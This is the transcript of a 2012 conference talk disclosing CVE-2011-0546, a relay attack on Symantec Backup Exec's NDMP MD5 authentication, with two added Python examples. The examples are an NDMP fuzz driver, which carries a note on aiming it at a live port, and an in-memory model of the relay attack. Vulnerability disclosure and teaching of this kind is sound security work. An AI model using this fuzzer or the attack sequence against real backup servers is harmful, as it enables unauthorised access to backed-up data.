Attacking Backup Softwares
DESCRIPTION
Presentation on "Attacking Backup Softwares" at nullcon 2012, Goa
TRANSCRIPT
Attacking Backup Softwares
Nibin Varghese
iViZ Security
Agenda
• Role of backup software
• History of backup software vulnerabilities
• Demonstration of the Symantec Backup Exec NDMP MiTM attack
Role of Backup Software
• "To protect valuable data"
From a security perspective, can we really rely on it?
History of Backup Software Vulnerabilities
Symantec Backup Exec: CVE-2011-0547, CVE-2011-0546, CVE-2009-3027, CVE-2009-0651, CVE-2008-5407, CVE-2008-5408, CVE-2007-6016, CVE-2007-6017, CVE-2008-4339, CVE-2008-2512, CVE-2008-0457, CVE-2007-4346, CVE-2007-4347 and more…
HP Data Protector: CVE-2011-3156, CVE-2011-3157, CVE-2011-3158, CVE-2011-3159, CVE-2011-3160, CVE-2011-3161, CVE-2011-3162, CVE-2011-0921, CVE-2011-0922, CVE-2011-0923, CVE-2011-0924, CVE-2011-0514, CVE-2011-2399 and more…
Why is backup software a good target?
• Critical data is backed up to prevent loss
• What would be an attacker's motivation?
If I am looking for confidential information, do I have to pwn all the machines in a network?
OR
Look for a piece of software that is trusted by all machines in the network
• A vulnerability in backup software is the sweet spot for stealing confidential information: one component holds copies of every host's data and is trusted by all of them.
I will demonstrate one such vulnerability
“CVE-2011-0546: Symantec Backup Exec NDMP MiTM Attack”
Symantec Backup Exec Software
• Short demo of the software
• DMA (Data Management Application): the NDMP client, running on the media server
• DSP (Data Service Provider): the NDMP server, the Remote Agent on the host being backed up
CVE-2011-0546 Symantec Backup Exec NDMP MiTM Attack
• Timeline of disclosure
• Bug discovered in early 2009
• Disclosed to the vendor in Jan 2010
• Vendor confirmation in Mar 2010
• Patch released on 26 May 2011
• iViZ advisory published on 27 May 2011
• PoC published on exploit-db in July 2011
Hunt for the bug
• Started with a survey of the Symantec Backup Exec software
• Product sheets for features
• Closely looked at the technologies it implements
• Open ports available for communication
• Short baby steps to fuzzing
• Blind fuzzing on open ports - failed
• Fuzzing with captured packets - failed
• Protocol-based fuzzing (NDMP) - failed
Hunt for the bug (cont)
• What is the Network Data Management Protocol (NDMP)?
• Based on a client-server model
• Allows data transfers between various storage devices connected over a network
• Separate data channel and control channel
• Challenges in fuzzing NDMP
• Driven by a state machine
• The sequence of commands is important: a message sent in the wrong state never reaches the code that handles it, so blind mutation of single packets tests very little
• As part of my survey, I found an academic paper, "Security Analysis of the NDMP Protocol" [1]
ftp://ftp.heanet.ie/mirrors/sourceforge/n/project/nd/ndmfs/SecurityAnalysis/v1.0/Security_Analysis_of_the_NDMP_Protocol.pdf
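The state-machine problem above is the reason the blind and packet-replay fuzzing attempts fail: anything sent before CONNECT_OPEN and CONNECT_CLIENT_AUTH is discarded, so the mutated bytes never reach the parsers for the post-authentication commands. The following is an added example, not the speaker's fuzzer or any Backup Exec code: a small NDMP v4 request encoder and a driver that replays the fixed handshake prefix unchanged on every round and mutates only the bodies of post-authentication messages. The message numbers, header layout and XDR record marking are taken from the NDMP v4 draft in the references; they are written here from memory and should be checked against the draft before use. There is no network I/O: the driver takes a send() callable, wired in demo() to an in-memory list, and the MD5 digest in the handshake is a placeholder because there is no live server to issue a challenge.

```python
"""Constructed example: NDMP v4 request encoder and a state-aware fuzz driver.
Message numbers and header layout follow the NDMP v4 draft referenced in the
talk (assumption: verify against the spec). No network I/O."""
import random
import struct

# ndmp_message values from the NDMP v4 draft (assumed correct, verify)
NDMP_CONFIG_GET_HOST_INFO = 0x100
NDMP_CONFIG_GET_AUTH_ATTR = 0x103
NDMP_DATA_START_BACKUP = 0x401
NDMP_DATA_LISTEN = 0x409
NDMP_CONNECT_OPEN = 0x900
NDMP_CONNECT_CLIENT_AUTH = 0x901
NDMP_MESSAGE_REQUEST = 0   # ndmp_header_message_type
NDMP_AUTH_MD5 = 2          # ndmp_auth_type
# header: sequence, time_stamp, message_type, message, reply_sequence, error
HEADER_FMT = ">6I"


def xdr_string(data: bytes) -> bytes:
    """XDR variable-length string/opaque: u32 length, bytes, zero pad to 4."""
    return struct.pack(">I", len(data)) + data + b"\0" * (-len(data) % 4)


def ndmp_request(sequence: int, message: int, body: bytes = b"") -> bytes:
    """One NDMP record: 4-byte record mark (last-fragment bit set, length of
    the rest), the 24-byte XDR header, then the request body."""
    header = struct.pack(HEADER_FMT, sequence, 0, NDMP_MESSAGE_REQUEST, message, 0, 0)
    record = header + body
    return struct.pack(">I", 0x80000000 | len(record)) + record


def parse_header(record: bytes) -> dict:
    """Inverse of ndmp_request for the header, used to inspect what was sent."""
    mark = struct.unpack(">I", record[:4])[0]
    seq, _ts, mtype, msg, _rseq, err = struct.unpack(HEADER_FMT, record[4:28])
    return {"last": bool(mark & 0x80000000), "length": mark & 0x7FFFFFFF,
            "sequence": seq, "message_type": mtype, "message": msg, "error": err}


def handshake(send, seq0: int = 1) -> int:
    """The fixed prefix the state machine demands: CONNECT_OPEN (version 4),
    CONFIG_GET_AUTH_ATTR (ask for an MD5 challenge), CONNECT_CLIENT_AUTH.
    The 16-byte digest is a placeholder; a live harness computes it from the
    challenge in the server's reply. Returns the next sequence number."""
    send(ndmp_request(seq0, NDMP_CONNECT_OPEN, struct.pack(">I", 4)))
    send(ndmp_request(seq0 + 1, NDMP_CONFIG_GET_AUTH_ATTR, struct.pack(">I", NDMP_AUTH_MD5)))
    auth_md5 = struct.pack(">I", NDMP_AUTH_MD5) + xdr_string(b"backup") + b"\0" * 16
    send(ndmp_request(seq0 + 2, NDMP_CONNECT_CLIENT_AUTH, auth_md5))
    return seq0 + 3


def mutate(body: bytes, rng: random.Random) -> bytes:
    """Byte-level mutation: flip one byte, insert a few, or truncate."""
    op = rng.choice(("flip", "insert", "truncate"))
    if op == "flip" and body:
        i = rng.randrange(len(body))
        return body[:i] + bytes([body[i] ^ rng.randrange(1, 256)]) + body[i + 1:]
    if op == "insert":
        i = rng.randrange(len(body) + 1)
        junk = bytes(rng.randrange(256) for _ in range(rng.randrange(1, 9)))
        return body[:i] + junk + body[i:]
    return body[: rng.randrange(len(body) + 1)]


def fuzz_session(send, rng: random.Random, post_auth, rounds: int = 3) -> None:
    """Each round replays the handshake untouched (one round = one fresh
    connection) and only then sends mutated post-authentication bodies with
    monotonic sequence numbers, so the mutation reaches the right parser."""
    for _ in range(rounds):
        seq = handshake(send)
        for message, body in post_auth:
            send(ndmp_request(seq, message, mutate(body, rng)))
            seq += 1


def demo(rounds: int = 2) -> list:
    """Run the driver against an in-memory sink with a fixed seed; returns the
    records that would have gone to the NDMP port. Bodies are constructed and
    partial (DATA_LISTEN addr_type, DATA_START_BACKUP butype name only)."""
    sent = []
    post_auth = [(NDMP_DATA_LISTEN, struct.pack(">I", 0)),
                 (NDMP_DATA_START_BACKUP, xdr_string(b"dump"))]
    fuzz_session(sent.append, random.Random(7), post_auth, rounds)
    return sent


if __name__ == "__main__":
    for rec in demo():
        print(parse_header(rec))
```

To use it against a real target, replace the list sink with a function that writes to a socket connected to the NDMP port and reads the reply after each record, and compute the CONNECT_CLIENT_AUTH digest from the challenge returned for CONFIG_GET_AUTH_ATTR; the sequencing logic stays the same.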
Security Analysis of the NDMP Protocol
• Passive attacks on the data channel
• If the attacker has network access, he can capture data channel traffic
• Active attacks
• NDMP uses sequence numbering with no message authentication
• MiTM attack on the NDMP MD5 auth scheme
ftp://ftp.heanet.ie/mirrors/sourceforge/n/project/nd/ndmfs/SecurityAnalysis/v1.0/Security_Analysis_of_the_NDMP_Protocol.pdf
NDMP MD5 auth scheme
Client → Server: sends a request to authenticate
Server → Client: sends a 64-byte challenge
Client → Server: sends a hash of the credentials (computed over the challenge)
Server: authenticates the client
Client → Server: executes post-authentication commands
MiTM attack on NDMP MD5 auth scheme
Client → Attacker: request to authenticate
Attacker → Server: replays the request to authenticate
Server → Attacker: sends a 64-byte challenge
Attacker → Client: replays the 64-byte challenge
Client → Attacker: sends the hash of the credentials
Attacker → Server: replays the hash of the credentials
Server: authenticates the attacker
Attacker → Server: executes post-authentication commands
Practical validation of the MiTM attack
• Possible attack vector #1
• Objective is to impersonate a client to the server
• No ARP poisoning
• Looking for more clues in the Symantec Backup Exec software
• Two open ports
• 6101/TCP at the DMA
• 10000/TCP at the DSP (NDMP)
Backup Exec Agent Browser at DMA
• The Backup Exec Remote Agent (DSP) publishes host details to the media servers (which run the DMA)
• NetBIOS name
• IP address
• It establishes a TCP/IP socket connection to port 6101/TCP at the media server
• The packet is processed by the Backup Exec Agent Browser (benetns.exe) at the DMA
[Packet capture: the fields identifying the type of host, the IP address of the host and the NetBIOS name of the host]
Backup Exec Agent Browser at DMA
• Publish fake hosts by changing the IP address in the announcement
• The DMA processes the packet with no validation of the source
• Even though it arrives over TCP rather than UDP, so the DMA could compare the connecting peer's address against it, the IP address carried in the payload is accepted as-is
• Good enough to make the attacker appear to the DMA as a valid DSP
Combining both Attack Vectors
• Attack vector #1
• MiTM attack on the NDMP MD5 auth
• Attack vector #2
• Spoof a valid DSP with the attacker's IP
• Result
• MiTM attack on Symantec Backup Exec to steal information from the DSP
MiTM Attack Sequence
Parties: Attacker; Client (DMA), Agent Browser on 6101/TCP; Server (DSP), NDMP on 10000/TCP
1. Attacker publishes fake host details to the DMA on 6101/TCP
2. Attacker starts a fake NDMP server on 10000/TCP
3. Client connects to the attacker's fake server
4. Client requests authentication
5. Attacker connects to the server on 10000/TCP
6. Attacker requests authentication on the server
7. Server sends a challenge to the attacker
8. Attacker sends the same challenge to the client
9. Client sends the authentication credentials (the hash) back to the attacker
10. Attacker uses these credentials to authenticate to the victim server
11. Attacker is authenticated and instructs the server to open a data channel
12. Attacker opens an NDMP data channel
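The MD5 challenge/response and the relay of steps 5 to 10 above, as an added example that is not the talk's PoC and not Backup Exec code: an in-memory Python model with three parties (DataManagementApp, DataServer, and an attacker that the DMA has been told is the DSP), no sockets. The 128-byte digest buffer layout in ndmp_md5_digest follows the open ndmjob reference implementation and is an assumption to verify against the NDMP v4 draft; the sample password and the two endpoint identities are constructed. The bound_digest variant is not part of NDMP; it is included only to show that the relay works because nothing about the peer enters the hash, and stops working as soon as something does.

```python
"""Constructed, in-memory model of NDMP MD5 authentication and the relay
(MiTM) attack on it. No network I/O; messages are passed as Python values."""
import hashlib
import hmac
import os

CHALLENGE_LEN = 64
PASSWORD = b"backup-secret"          # constructed sample credential
SERVER_ID = b"dsp.example.test"      # identity of the real DSP (assumed)
ATTACKER_ID = b"evil.example.test"   # what the DMA thinks it is talking to


def ndmp_md5_digest(challenge: bytes, password: bytes) -> bytes:
    """NDMP_AUTH_MD5 response: MD5 over a 128-byte buffer. Layout as in the
    ndmjob reference implementation (assumption, verify against the draft):
    password at offset 0, password again right-justified at 64-len, then
    the 64-byte challenge. Nothing about the peer or the connection enters
    the hash, which is what makes the relay possible."""
    if len(challenge) != CHALLENGE_LEN or len(password) > 64:
        raise ValueError("bad challenge or password length")
    buf = bytearray(128)
    buf[0:len(password)] = password
    buf[64 - len(password):64] = password
    buf[64:] = challenge
    return hashlib.md5(bytes(buf)).digest()


def bound_digest(challenge: bytes, password: bytes, peer_id: bytes) -> bytes:
    """Hardened variant (constructed, not NDMP): the response also covers the
    identity of the server the client believes it is talking to."""
    return hmac.new(password, challenge + peer_id, hashlib.md5).digest()


class DataServer:
    """DSP: issues a fresh 64-byte challenge and verifies the digest."""

    def __init__(self, password: bytes, bind: bool = False):
        self.password, self.bind, self.challenge = password, bind, None
        self.authenticated = False

    def config_get_auth_attr(self) -> bytes:
        self.challenge = os.urandom(CHALLENGE_LEN)
        return self.challenge

    def connect_client_auth(self, digest: bytes) -> bool:
        if self.bind:
            expected = bound_digest(self.challenge, self.password, SERVER_ID)
        else:
            expected = ndmp_md5_digest(self.challenge, self.password)
        self.authenticated = hmac.compare_digest(expected, digest)
        return self.authenticated


class DataManagementApp:
    """DMA: answers whatever challenge the peer it connected to hands it."""

    def __init__(self, password: bytes, bind: bool = False):
        self.password, self.bind = password, bind

    def answer(self, challenge: bytes, peer_id: bytes) -> bytes:
        if self.bind:
            return bound_digest(challenge, self.password, peer_id)
        return ndmp_md5_digest(challenge, self.password)


def legitimate_session(bind: bool = False) -> bool:
    """DMA talks directly to the DSP; must succeed in both schemes."""
    dsp, dma = DataServer(PASSWORD, bind), DataManagementApp(PASSWORD, bind)
    return dsp.connect_client_auth(dma.answer(dsp.config_get_auth_attr(), SERVER_ID))


def relay_attack(bind: bool = False) -> bool:
    """Steps 5-10 of the attack sequence. The attacker never sees PASSWORD;
    it only forwards bytes. Returns True if the DSP authenticates it."""
    dsp, dma = DataServer(PASSWORD, bind), DataManagementApp(PASSWORD, bind)
    # 5-7: attacker connects to the real DSP and is given a challenge
    challenge = dsp.config_get_auth_attr()
    # 8-9: attacker, posing as the DSP (the spoofed 6101/TCP publish made the
    #      DMA connect to it), hands the same challenge to the DMA
    digest = dma.answer(challenge, ATTACKER_ID)
    # 10: attacker replays the DMA's answer to the real DSP
    return dsp.connect_client_auth(digest)


if __name__ == "__main__":
    print("plain NDMP MD5: legit", legitimate_session(), "relay", relay_attack())
    print("bound variant : legit", legitimate_session(True), "relay", relay_attack(True))
```

The relay succeeds with the plain scheme and fails with the bound one, which isolates the property the attack exploits: the challenge proves the client knows the password, but not to whom it is proving it. Binding the response to the peer is a toy illustration here, since in the real deployment the DMA's view of "the peer" is exactly what the 6101/TCP spoof corrupts; the vendor's patch, not this variant, is the fix for CVE-2011-0546.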
Ready for PoC Demo?
• Scope of the PoC
• Exploit the weakness in NDMP authentication to execute post-authentication commands
• Out of scope
• Reverse engineering all the proprietary NDMP commands
• Demo
References
• iViZ Security Advisory
http://www.ivizsecurity.com/security-advisory-iviz-sr-11001.html
• Symantec Advisory
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2011&suid=20110526_00
• Security Analysis of NDMP Protocol
ftp://ftp.heanet.ie/mirrors/sourceforge/n/project/nd/ndmfs/SecurityAnalysis/v1.0/Security_Analysis_of_the_NDMP_Protocol.pdf
• NDMP Specification
http://www.ndmp.org/download/sdk_v4/draft-skardal-ndmp4-04.txt
• Exploit DB for PoC
http://www.exploit-db.com/exploits/17517/
Questions
Thank you
twitter.com/nibin012 github.com/nibin